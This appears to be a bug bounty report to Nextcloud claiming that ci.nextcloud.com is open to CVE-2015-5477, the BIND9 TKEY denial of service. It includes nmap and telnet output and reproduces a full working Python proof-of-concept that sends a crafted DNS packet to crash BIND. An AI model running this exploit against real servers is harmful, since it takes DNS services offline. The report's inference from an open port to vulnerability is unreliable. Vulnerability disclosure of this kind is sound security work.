7.8 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:N/I:N/A:C
0.973 High
EPSS
Percentile
99.8%
Hello Team NextCloud,
In reference report #217381
Iāve reported the DDOS attack via DNS Port at OwnCloudā¦
And it was successfully patched.
But now same issue I got at
ci.nextcloud.com
Proof Of Concept:
Here it is the nmap result of ci.nextcloud.com
NMap Scan Results:
Starting Nmap 7.40 ( https://nmap.org ) at 2017-06-08 04:12 PKT
Nmap scan report for ci.nextcloud.com (āāāāā)
Host is up (0.077s latency).
rDNS record for āāāāāāāāā: āāāāāāā
Not shown: 96 filtered ports
PORT STATE SERVICE VERSION
22/tcp open tcpwrapped
53/tcp open tcpwrapped
80/tcp open tcpwrapped
443/tcp open tcpwrapped
Now here it is the telnet result:
āāā¼ $telnet
telnet> open
(to) ci.nextcloud.com 53
Trying āāā...
Connected to ci.nextcloud.com.
Escape character is '^]'.
So this can leads to a serious DDOS attack at doc.owncloud.com using the exploitā¦
Exploit Link:
https://github.com/elceef/tkeypoc/
Vulnerability Reference CVE Details:
https://vulners.com/cve/CVE-2015-5477
Exploit PoC:
Exploit Title: PoC for BIND9 TKEY DoS
Exploit Author: elceef
Software Link: https://github.com/elceef/tkeypoc/
Version: ISC BIND 9
Tested on: multiple
CVE : CVE-2015-5477
!/usr/bin/env python
import socket
import sys
print('CVE-2015-5477 BIND9 TKEY PoC')
if len(sys.argv) < 2:
print('Usage: ' + sys.argv[0] + ' [target]')
sys.exit(1)
print('Sending packet to ' + sys.argv[1] + ' ...')
payload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex'))
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], 53))
print('Done.')
Thanks :)